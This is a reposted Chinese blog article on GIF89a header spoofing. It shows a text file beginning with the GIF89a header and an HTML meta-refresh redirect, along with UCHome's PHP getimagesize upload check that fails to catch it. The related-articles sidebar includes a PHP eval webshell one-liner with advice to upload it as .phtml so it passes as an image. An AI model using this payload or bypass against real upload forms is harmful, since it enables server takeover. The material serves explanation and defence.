(转)GIF89a图片头文件欺骗

最新推荐文章于 2023-07-24 09:30:08 发布
最新推荐文章于 2023-07-24 09:30:08 发布
阅读量2k 收藏 1
点赞数
文章标签: Firefox Flash PHP Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_16225/article/details/81999857
版权

1、什么是GIF89a

    一个GIF89a图形文件就是一个根据图形交换格式(GIF)89a版(1989年7 月发行)进行格式化之后的图形。在GIF89a之前还有87a版(1987年5月发行),但在Web上所见到的大多数图形都是以89a版的格式创建的。 89a版的一个最主要的优势就是可以创建动态图像,例如创建一个旋转的图标、用一只手挥动的旗帜或是变大的字母。特别值得注意的是,一个动态GIF是一个 以GIF89a格式存储的文件,在一个这样的文件里包含的是一组以指定顺序呈现的图片。

2、GIG89a实例

用记事本编写一下内容,然后修改后缀变成图片

 

view plain copy to clipboard print ?
  1. GIF89a  
  2. <head>  
  3. <meta http-equiv = "refresh" content = "1; url=http://www.***.com/" />  
  4. </head>  
。 当单独查看此文件时,会出现GIF89a,然后跳转到指定的网页(ie6和ie7下,Firefox下不可以)。

 

3、php下检测(使用getimagesize函数无法判断其图片是无效的)

uchome2.0的处理(1.5有此漏洞):

view plain copy to clipboard print ?
  1. //检查是否图片  
  2.     if(function_exists('getimagesize')) {  
  3.         $tmp_imagesize = @getimagesize($new_name);  
  4.         list($tmp_width$tmp_height$tmp_type) = (array)$tmp_imagesize;  
  5.         $tmp_size = $tmp_width * $tmp_height;  
  6.         if($tmp_size > 16777216 || $tmp_size < 4 || emptyempty($tmp_type) || strpos($tmp_imagesize['mime'], 'flash') > 0) {  
  7.             @unlink($new_name);  
  8.             return cplang('only_allows_upload_file_types');  
  9.         }  
  10.     }  

 

iteye_16225
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
伪造gif文件的处理
12-02
用于asp上传组件中出现漏洞处理措施 用于asp上传组件中出现漏洞处理措施 用于asp上传组件中出现漏洞处理措施 用于asp上传组件中出现漏洞处理措施
汉字拼音
热门推荐
hhp895的专栏
08-24 12万+
 public class hanzi_to_pinyin1    {        private static readonly string[][] _Allhz =    new string[][]   {    new string[]{"A","啊阿呵吖嗄腌锕錒"},    new string[]{"Ai","爱矮挨哎碍癌艾唉哀蔼隘埃皑呆嗌嫒瑷暧捱砹嗳锿霭乂乃伌僾儗凒剀剴叆呃呝啀嘊
获取汉字拼音码
活下去,学下去
07-24 9255
原理都一样,从c++翻过来的,其他语言也是一样的。本来有几个函数,但感觉获取的不是很利索。
mysql数据狛聘_.net 生成拼音码与五笔码实例代码
weixin_32159633的博客
01-26 2万+
阿啊锕嗄厑哎哀唉埃挨溾锿鎄啀捱皑凒溰嘊敳皚癌毐昹嗳矮蔼躷噯藹譪霭靄艾伌爱砹硋隘嗌塧嫒愛碍暧瑷僾壒嬡懓薆曖璦鴱皧瞹馤鑀鱫安侒峖桉氨庵谙萻腤鹌蓭誝鞌鞍盦馣鮟盫韽啽雸垵俺唵埯铵隌揞罯銨犴岸按荌案胺豻堓婩暗貋儑錌黯肮岇昂昻枊盎醠凹坳垇柪軪爊敖厫隞嗷嗸嶅廒滶獒獓遨熬璈蔜翱聱螯翶謷翺鳌鏖鰲鷔鼇芺袄媪镺襖岙扷岰傲奡奥嫯慠骜奧嶴澳懊擙謸鏊八仈巴叭扒朳玐吧夿岜芭疤哵捌笆粑紦羓蚆釟豝鲃魞叐犮抜坺妭拔茇炦癹胈釛菝詙跋軷...
java 对错代厔_将汉语换成拼音,实现拼音和中文双重登录
weixin_33549415的博客
02-24 3万+
在一次项目中遇到,绝对原创,网上有很多不能用,如果要载,请注明出处!谢谢!using System.Runtime.InteropServices;using System.Runtime.CompilerServices;using System.Data;using System;using System.Text;using System.Text.RegularExpressions;p...
GIF 89a图像格式解析
QQ135102692的博客
05-17 6312
一、GIF 89a图像介绍 89a是针对87a的升级版本,相比于后者增加了一些额外的控制块更加精确的控制GIF播放。现在常见的GIF图都是89a,下面将使用一张10x10的gif来理解GIF的图像格式 二、winhex打开10*10的GIF图像 三、GIF文件头 6byte 47 49 46 38 39 61 标识GIF89a 四、屏幕描述块 7byte pixel:标识图像的颜色表数量所占的位数,即颜色表2^( pixel + 1) s :表示后面的颜色表是否有序 cr :cr
GIF89a图片欺骗攻击
weixin_50464560的博客
08-06 2632
进入到linux的tmp目录里一看,很吃惊,一堆php开头的文件,如下图: 不知道是哪里来的,而且已经很久了。查看内容基本都是这样的: [root@kermit tmp]# cat phpzpqXzeGIF89a<%response.Write(987651234-123498765)strURL = Request.Servervariables(“url”)intPos = InstrRev(strURL,”/”)intStrLen = len(strURL)strFileName = Righ
GIF图像格式简介(87a和89a)(C语言生成GIF图像)
梦的灰色边沿...
02-27 8408
1 GIF图简介   GIF(Graphics Interchange Format)图像格式是Compuserve与1987年开发的一种图像文件格式。该图像本身可以存储静态图和动态图,但如今该图像主要被用来存储动态图,且在大部分系统上都支持。但是相对于webp这些新式的动态图格式,其在颜色质量和压缩率上的表现相对不如人意。   该图像表达图像和一般的图像直接存储图像内容不同,而是通过一个颜色表映射来表达对应的图像的内容。也就是说图像中存在一张颜色表存储图像中出现的颜色,然后每一帧的图像通过颜色索引来表示颜
GIF89a
weixin_59392781的博客
09-15 1876
GIF89a <script language="php">eval($_GET[shell])</script> 当不能使用php代码直接注入时可以改为phtml格式加入GIF89a(图片头文件欺骗),后台认为是图片,上传后再执行木马。
GIF89a图片头文件欺骗
piaolankeke
09-09 3万+
<br />1、什么是GIF89a<br />    一个GIF89a图形文件就是一个根据图形交换格式(GIF89a版(1989年7 月发行)进行格式化之后的图形。在GIF89a之前还有87a版(1987年5月发行),但在Web上所见到的大多数图形都是以89a版的格式创建的。 89a版的一个最主要的优势就是可以创建动态图像,例如创建一个旋的图标、用一只手挥动的旗帜或是变大的字母。特别值得注意的是,一个动态GIF是一个 以GIF89a格式存储的文件,在一个这样的文件里包含的是一组以指定顺序呈现的图片
GIF动画全操作支持库1.3版(GIF89a.fne)-易语言
06-13
本支持库用来合成和解析GIF动画。 操作系统支持: Windows
直接显示GIF图片的C++类(GIF87a,GIF89a,JPEG, BMP, WMF, ICO, CUR)
03-17
Picture displaying control with support for the following formats: GIF (including animated GIF87a and GIF89a), JPEG, BMP, WMF, ICO, CUR
易语言-GIF动画全操作支持库 (1.3#0版)(GIF89a.fne)
06-28
本库为一般支持库,需要易系统3.0版本的支持,需要系统核心支持库3.8版本的支持,提供了4种库定义数据类型,提供了18种命令,提供了4个库定义常量。 操作系统需求: Windows
gifencoder:实现GIF89a规范的纯Java库。 适用于Android
04-22
GIF图像限制为256色。 如果您提供颜色更多的图像,则gifencoder的默认行为是使用进行。 您可以通过ImageOptions配置此行为。 提供了一些量化器和抖动器,但是您也可以插入自己的实现。 基本用法 int [][] ...
PHPResizeGif:符合GIF89aGif尺寸调整器,包括透明度和具有小尺寸元素的优化gif
05-16
该软件包旨在对包含GIF89a规范的gif文件进行适当的大小调整。 介绍 大多数(如果不是全部)其他所有公开可用的gif调整大小包都无法通过优化的gif文件失败,那些仅在后续帧中更新文件一部分的文件。 将这些视作背景...
126邮箱页 html源码 单页源码 网站后台登陆界面HTML源码.zip
04-23
126邮箱页 html源码 单页源码 网站后台登陆界面HTML源码
武汉开放数据创新大赛——烽火杯文件.zip
04-23
武汉开放数据创新大赛——烽火杯文件
mmexport1713881481676.png
04-23
mmexport1713881481676.png
Digital currency trading platformAdobeXD源码下载设计素材UI设计.xd
最新发布
04-23
Digital currency trading platform landing pageAdobeXD源码下载设计素材UI设计
matlab遇到该问题如何解决:错误使用 matlab.internal.imagesci.wgifc 只能追加 GIF89a 格式的 GIF
06-07
这种错误通常是由于使用了不支持的GIF格式导致的。您可以尝试使用其他格式的GIF文件,或者使用其他软件将您的GIF文件换为GIF89a格式。您还可以尝试使用以下方法解决该问题: 1. 确认您的MATLAB版本是否支持GIF格式。 2. 尝试使用其他GIF读取函数,例如imread。 3. 尝试在读取GIF文件时使用不同的参数或选项。 4. 如果您的GIF文件是由其他软件生成的,请尝试使用该软件重新保存文件并选择GIF89a格式。 5. 检查您的GIF文件是否损坏或不完整,如果是,请尝试使用其他文件。 如果您尝试了以上方法后仍然无法解决问题,请考虑联系Mathworks的技术支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值